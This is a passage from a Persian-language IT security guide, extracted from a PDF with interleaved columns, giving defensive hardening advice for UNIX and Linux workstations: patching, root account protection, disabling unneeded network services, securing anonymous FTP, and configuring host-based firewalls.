‫)ﺍﺯ ﺩﻳﺪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﺎﺯﻩﻛﺎﺭ( ﻫﻤﺮﺍﻩ ﻧﺸﺪ‪ .‬ﺩﺭﻧﺘﻴﺠـﻪ ﺯﻣـﺎﻧﻲ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺳﻴــﺴﺘﻤﻬﺎ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﻏﻴــﺮ ﻣﺘﺨــﺼﺺ ‪ UNIX‬ﺑﻌﻨــﻮﺍﻥ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ‪ ،‬ﻭﺟـﻮﺩ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻗـﻮﻱ ﺑـﺮﺍﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﻻﺯﻡ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﻫﺮ ﺣـﺎﻝ ﭘﺎﻳـﻪ ﻭ ﺍﺳـﺎﺱ‬
‫ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻫﻨﻮﺯ ﭘﻴﭽﻴﺪﻩ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻲﺗﺠﺮﺑـﻪ ﻭ‬
‫ﺗﺎﺯﻩﻛﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺭﺍﻫﻬـﺎﻱ ﻭﺭﻭﺩ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﻳﻚ ﺧﺮﺍﺑﻜﺎﺭﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﺯ ﮔﺬﺍﺭﺩ‪ .‬ﺍﮔﺮﭼـﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪UNIX‬‬
‫ﻧﺴﺒﺘﹰﺎ ﻋﺎﺭﻱ ﺍﺯ ﻭﻳﺮﻭﺱ ﻫﺴﺘﻨﺪ ﻭﻟﻲ ﭘـﺬﻳﺮﺍﻱ ﺁﺧـﺮﻳﻦ ﻛﺮﻣﻬـﺎ ﻭ‬
‫ﺗﺮﻭﺍﻫﺎﻱ ﻣﻨﺘﺸﺮ ﺷﺪﻩ ﻣﻲﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﻟـﺬﺍ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻫﻨـﻮﺯ ﺟـﺰﺀ‬
‫ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﻩ ﺁﻧﻬﺎ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ‬
‫ﺗﻤﺎﻣﻲ ﻋﻨﺎﻭﻳﻨﻲ ﻛﻪ ﺩﺭ ‪ ۷‬ﻓﺼﻞ ﮔﺬﺷـﺘﻪ ﺫﻛـﺮ ﺷـﺪﻧﺪ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Linux ،UNIX‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣـﺸﺎﺑﻪ ﺁﻧﻬـﺎ ﻧﻴـﺰ‬
‫ﺻﺎﺩﻕ ﻫﺴﺘﻨﺪ ﻭ ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺑﺨﻮﺍﻫﻴـﺪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺭﺍ ﻭﺍﺟـﺪ‬
‫ﺍﻣﻨﻴﺖ ﻧﺴﺒﻲ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﺑﻪ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﭙﺮﺩﺍﺯﻳﺪ‪ .‬ﺍﻳﻦ ﺑﺨـﺶ ﺭﻭﻱ‬
‫ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛﺎﺭﻱ ﺗـﻚﻛـﺎﺭﺑﺮﻩ ﻣﺘﻤﺮﻛـﺰ ﺍﺳـﺖ‪ .‬ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ‬
‫ﻣﺴﺌﻮﻝ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻫﺴﺘﻨﺪ ﺑﺎﻳﺪ ﺑﺨﺶ ﭘﻨﺠﻢ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻨﺪ‪.‬‬
‫ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ‪UNIX‬‬
‫ﺑﻪ ﺩﻟﻴﻞ ﻭﺟﻮﺩ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺷـﺒﻴﻪ ‪،UNIX‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﺯ ﭘﻴﺶ ﻧﺼﺐ ﺷﺪﺓ‬
‫ﺍﻣﻨﻴﺘﻲ‪ ١٢٦‬ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﺩﺍﺭﻧـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺑـﺴﻴﺎﺭ‬
‫ﻣﻬﻢ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﻨﻤﺎﻱ ﻋﻤﻠﻲ ﺁﻥ ﻧﮕﺎﺭﺵ ﺍﺯ ‪ Unix‬ﻛـﻪ‬
‫ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻣﻄﺎﻟﻌـﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﻧـﺎﻡ ﭼﻨـﺪﻳﻦ‬
‫ﻛﺘﺎﺏ‪ ،‬ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻉ ﺭﺳﺎﻧﻲ‪ ،‬ﻭ ﮔﺮﻭﻩ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻣﻔﻴﺪ ﻛﻪ ﺑﻪ ﺍﻣﻨﻴـﺖ ‪ Unix‬ﺍﺧﺘـﺼﺎﺹ ﺩﺍﺭﻧـﺪ ﺩﺭ ﺑﺨـﺶ‬
‫ﺿﻤﺎﺋﻢ ﻛﺘﺎﺏ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﺘﻤﹰﺎ ﺑﺎﻳـﺪ ﺑـﻪﺭﻭﺯ ﮔـﺮﺩﺩﻭ ﺗﻤـﺎﻣﻲ ﻭﺻـﻠﻪﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺳﺮﻳﻌﹰﺎ ﺭﻭﻱ ﺁﻥ ﻧﺼﺐ ﺷﻮﻧﺪ‪ .‬ﺟﺰﺋﻴﺎﺕ ﺍﻳﻨﻜﻪ ﺑﺴﺘﺔ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺍﺯ ﻛﺠﺎ ﺑﺎﻳـﺪ ﺗﻬﻴـﻪ ﻛـﺮﺩ ﻭ ﭼﮕﻮﻧـﻪ ﺁﻧـﺮﺍ‬
‫ﺍﻋﻤﺎﻝ ﻧﻤﻮﺩ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺖ‪.‬‬
‫‪126 Pre-Installed Security Mechanisms‬‬
‫‪١٠٣‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﺍﮔﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻛﺎﺭﺑﺮ ﺩﺍﺭﻳﺪ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ‬
‫ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ‪ ١٢٨‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎ ﻳﻚ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‬
‫ﻏﻴــﺮ ﺍﺯ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺒﻜﻪﺍﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﻫﻴﭽﮕﺎﻩ ﺑﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ‪ ،‬ﻧﺮﻡﺍﻓﺰﺍﺭ ﺟﺪﻳﺪ ﺭﺍ ﺑﺎﺯ ﻭ‬
‫ﻻ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﻣﺤﻴﻄﻲ ﻛـﻪ ﺑـﺎ‬
‫ﻳﺎ ﻛﺎﻣﭙﺎﻳﻞ ﻧﻜﻨﻴﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫‪ chroot‬ﻭﺍﺭﺩ ﺁﻥ ﻣﻲﺷﻮﻳﺪ ﻛﺎﻣﭙﺎﻳﻞ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺍﺯ ﺷـﻤﺎ‬
‫ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﺗﺮﻭﺍﻫﺎ ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻧﺼﺐ ﺩﻳﺴﻜﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻣﻲﮔﻴﺮﻧﺪ‬
‫ﺍﮔﺮ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺩﻳـﺴﻚ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ‬
‫ﻣﺨﺘﻠﻒ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ )ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ ﻳـﺎ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ (UNIX‬ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ‬
‫ﺭﻣﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﻣﻨﺎﺳــﺒﻲ ﺗﻌﻴــﻴﻦ ﻭ ﺩﺭﺻــﻮﺭﺕ ﺍﻣﻜــﺎﻥ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯﻣﻨﺪﻧﺪ ﺭﺍ‬
‫ﺗﻨﻬﺎ ﺑﻪ ﻫﻤﺎﻥ ﺍﻧﺪﺍﺯﺓ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪127 Root User‬‬
‫‪128 Access Control List‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ ‪inetd‬‬
‫ﻳــﺎ ‪ xinetd‬ﺷــﺮﻭﻉ ﺑــﻪ ﻓﻌﺎﻟﻴــﺖ ﻣــﻲﻛﻨﻨــﺪ‪ .‬ﻓﺎﻳﻠﻬــﺎﻱ‬
‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﻪ ﺗﻮﺳﻂ ﺍﻳﻦ ‪ daemon‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﻫﺮﻳﻚ ﺍﺯ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻻﺯﻡ‬
‫ﻧﺪﺍﺭﻳﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺧﺪﻣﺎﺕ ﺷـﺒﻜﻪﺍﻱ ﺩﻳﮕـﺮ ﻛـﻪ‬
‫ﻫﻨﮕﺎﻡ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﻴﺴﺘﻢ ﺷﺮﻭﻉ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣـﻲﻛﻨﻨـﺪ ﺩﺭ‬
‫ﻓﺎﻳﻠﻬــﺎﻳﻲ ﺩﺭ ﻣــﺴﻴﺮ ‪ /etc/init.d‬ﻳــﺎ ‪ /etc/rc*.d‬ﻭ ﻳــﺎ‬
‫‪ /etc/rc‬ﻭ ‪ /etc/rc.local‬ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪ .‬ﺑـﻪ ﺧـﺪﻣﺎﺗﻲ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻃﻼﻋﺎﺕ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﺎﺭﺑﺮ ﺁﻧﺮﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ‬
‫ﺩﻳﮕﺮﺍﻥ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ ‪ -‬ﻣﺜـﻞ ‪ - fingerd‬ﺗﻮﺟـﻪ ﻭﻳـﮋﻩ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﺮﻭﻳﺲ ‪ FTP‬ﻧﺎﺷﻨﺎﺱ‪ ١٢٩‬ﺭﺍ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﻧﻤـﻮﺩﻩ ﺍﻳـﺪ‬
‫ﺣﺘﻤــﹰﺎ ﺁﻧـــﺮﺍ ﺑـــﻪﺭﻭﺯﺭﺳـــﺎﻧﻲ ﻧﻤﺎﻳﻴـــﺪ‪ .‬ﻫﺮﮔـــﺰ ﻓﺎﻳـــﻞ‬
‫‪ /etc/passwd‬ﺭﺍ ﺩﺭ ﻣﺤــﻴﻂ ‪ FTP‬ﺗﺒــﺎﺩﻝ ﻧﻜﻨﻴــﺪ‪.‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻳﺎﺑﻴﺪ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ‪ bin ،uucp ،root‬ﻭ‬
‫ﺩﻳﮕﺮ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻛﺎﺭﺑﺮ ﺧﺎﺻﻲ ﻗﺮﺍﺭ ﻧﺪﺍﺭﻧـﺪ‬
‫ﺩﺭ ﻓﺎﻳــﻞ ‪ - /etc/ftpusers‬ﻛــﻪ ﺷــﺎﻣﻞ ﻓﻬﺮﺳــﺖ‬
‫ﻛﺎﺭﺑﺮﺍﻧﻲ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ‪ FTP‬ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ‪-‬‬
‫ﻭﺟــﻮﺩ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ‪ .‬ﻣﺮﺍﻗــﺐ ﻣﺠــﻮﺯ ﺩﺳﺘﺮﺳــﻲ ﺑــﻪ‬
‫ﺷﺎﺧﻪﻫﺎ‪ ١٣٠‬ﻭ ﻣﺎﻟﻜﻴﺖ‪ ١٣١‬ﺁﻧﻬﺎ ﺩﺭ ﻣﺤﻴﻂ ‪ FTP‬ﺑﺎﺷﻴﺪ‪ .‬ﺍﺯ‬
‫ﺍﻧﺠﺎﻡ ‪ download‬ﺗﻮﺳﻂ ﻣـﺴﻴﺮﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻭ ﺍﻧﺠـﺎﻡ‬
‫‪129 Anonymous FTP‬‬
‫‪130 Directory Permission‬‬
‫‪131 Ownership‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﻛﺎﺭﺑﺮ ﺭﻳﺸﻪ‪ (uid 0) ١٢٧‬ﺑﺎﻻﺗﺮﻳﻦ ﺳﻄﺢ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺩﺍﺭﺩ‬
‫ﻻ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻤﺎﻣﻲ ﺍﺑﻌﺎﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﺪ‪ .‬ﺑـﺮ‬
‫ﻭ ﻣﻌﻤﻮ ﹰ‬
‫ﻫﻤــﻴﻦ ﺍﺳــﺎﺱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﻭ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﻛﻪ ﺍﺟﺮﺍﻱ ﺁﻧﻬﺎ ﺗﻮﺳﻂ ﺍﻳﻦ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺑﻌﺎﺩ ﺍﻣﻨﻴﺖ ‪ UNIX‬ﺑـﺸﻤﺎﺭ‬
‫ﻣــﻲﺭﻭﺩ‪ .‬ﺍﺯ ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺣــﺴﺎﺏ ﻛــﺎﺭﺑﺮﻱ ﺭﻳــﺸﻪ ﺩﺭ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﺧـﻮﺩﺩﺍﺭﻱ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﺑﻴﺸﺘﺮ ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺏ‬
‫ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻳـﻦ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺍﺯ ﺩﺳـﺘﻮﺭ ‪superuser‬‬
‫)‪ su‬ﻳﺎ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ ‪ (sudo‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺣـﺴﺎﺏ‬
‫ﻛﺎﺭﺑﺮﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﺗﺒﺪﻳﻞ‬
‫ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺑـــﺴﻴﺎﺭﻱ ﺍﺯ ﺩﺳـــﺘﮕﺎﻫﻬﺎﻱ ‪ UNIX‬ﺩﺍﺭﺍﻱ ﺧـــﺪﻣﺎﺕ‬
‫ﺳﻴــﺴﺘﻤﻲ ﮔــﺴﺘﺮﺩﻩﺍﻱ ﻫــﺴﺘﻨﺪ‪ ،‬ﻣﺜــﻞ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ‬
‫‪ ،FTP‬ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﻭﺏ ﻭ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﭘــﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣـﻮﺍﺭﺩ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﺑـﺼﻮﺭﺕ‬
‫ﭘﻴﺶﻓﺮﺽ ﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ‪ .‬ﺗﻤﺎﻣﻲ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑﺮ ﺷﺒﻜﻪ‬
‫ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤـﻲ ﮔﻴﺮﻧـﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﺳـﺎﺯﻳﺪ‪.‬‬
‫ﺑﻌﻀﻲ ﻣﺮﺩﻡ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨﺪ ﭼـﻮﻥ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﻭﺟـﻮﺩ‬
‫ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤـﻮﺩ ‪ -‬ﺣﺘـﻲ ﺍﮔـﺮ ﺗﺨـﺼﺺ‬
‫ﻓﻨﻲ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺷﺘﺒﺎﻩ‬
‫ﺑﺰﺭﮔﻲ ﺍﺳﺖ ﻭ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻧﺒﺎﻳﺪ ﺑﺪﻭﻥ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨـﺪﻩ‬
‫ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻛﺎﻓﻲ ﺩﺭ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪١٠٤‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫‪ upload‬ﺑﻮﺳﻴﻠﻪ ﻣﺴﻴﺮﻫﺎﻱ ﺧﺮﻭﺟﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴـﺪ‪،‬‬
‫ﻭ ﺑﺎﻻﺧﺮﻩ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺛﺒﺘﻬﺎﻱ ﺳـﺮﻭﻳﺲ ‪ FTP‬ﺧـﻮﺩ ﺭﺍ‬
‫ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
‫ﻫــﺮ ﺳﻴــﺴﺘﻢ ‪ UNIX‬ﺑﺎﻳــﺪ ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﻣﺒﺘﻨــﻲ ﺑــﺮ‬
‫ﻣﻴﺰﺑﺎﻥ‪ ١٣٢‬ﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺗـﺼﻔﻴﺔ ﺑـﺴﺘﻪﻫـﺎ‬
‫‪١٣٣‬‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺍﺯ ﻣﺴﺘﻨﺪﺍﺕ ﻓﺮﻭﺷﻨﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺗـﺎ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ ﻛﻪ ﺁﻳﺎ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺍﺭﺍﻱ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ‪ ،‬ﻭ ﺍﮔﺮ ﻫﺴﺖ ﭼﮕﻮﻧﻪ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ‬
‫ﻻ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ‬
‫ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺩﻳــﻮﺍﺭﺓ ﺁﺗــﺶ ﺷــﺎﻣﻞ ‪ ipchains ،ipfw‬ﻭ ‪iptables‬‬
‫ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﭘﻴﻜـﺮﺑﻨـﺪﻱ‬
‫ﺷﻮﻧﺪ ﻛﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺭﺍﻩ ﻋﺒﻮﺭ ﺗﻤـﺎﻣﻲ ﺑـﺴﺘﻪﻫـﺎ ﺭﺍ‬
‫ﻣﺴﺪﻭﺩ ﻛﻨﻨﺪ ﻭ ﺗﻨﻬﺎ ﺑﻪ ﺁﻧﻬﺎﻳﻲ ﻣﺠـﻮﺯ ﻋﺒـﻮﺭ ﺩﻫﻨـﺪ ﻛـﻪ‬
‫ﻣﻘﺼﺪ ﺁﻧﻬﺎ ﺧﺪﻣﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺷﻤﺎ ﺧﻮﺍﺳﺘﻪﺍﻳﺪ‪.‬‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﭘﻴﺶﻓﺮﺽ‬
‫ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺩﺍﺭﺍﻱ ﭼﻨــﺪﻳﻦ ﺣــﺴﺎﺏ‬
‫ﻛــﺎﺭﺑﺮﻱ ﭘــﻴﺶﻓــﺮﺽ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺑــﺮﺍﻱ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ‬
‫ﺟﺪﺍﮔﺎﻧﻪ ﻳﺎ ﻣﺠﻮﺯ ﻣﺎﻟﻜﻴﺖ ﻓﺎﻳﻠﻬﺎ ﻣﺎﻧﻨﺪ ‪daemon ،bin‬‬
‫ﻭ ‪ uucp‬ﻭ ﻏﻴﺮﻩ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺍﻃﻤﻴﻨـﺎﻥ‬
